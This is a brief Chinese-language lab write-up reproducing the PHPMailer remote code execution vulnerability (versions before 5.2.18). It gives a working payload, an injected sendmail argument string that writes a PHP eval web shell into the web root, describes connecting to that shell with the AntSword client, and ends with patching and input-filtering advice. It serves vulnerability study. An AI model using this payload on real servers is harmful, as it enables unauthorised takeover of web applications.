PHPMailer远程命令执行漏洞复现
漏洞简介:
PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。
PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。
影响版本:
PHPMailer<5.2.18
环境搭建:
这里采用现成靶机
漏洞复现:
aaa
"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com
<?php @eval($_POST['thelostworld']); ?> 注意:(空格很严格)
发送邮件
显示发送不成功,其实已经发送成功
访问上传的shell文件,发现上传成功
蚁剑进行连接,获得后台
漏洞防御:
目前此漏洞已经修复,建议及时升级更新至PHPMailer 6.5.0。
下载链接:
https://github.com/PHPMailer/PHPMailer
通用安全建议:
对代码进行安全审计,尽早检测潜在的安全漏洞,并增强代码逻辑性。
对用户的输入进行过滤或转义,避免参数可控。
用户应定期更新软件、程序和应用程序,确保应用程序是最新的,以保护系统免受漏洞利用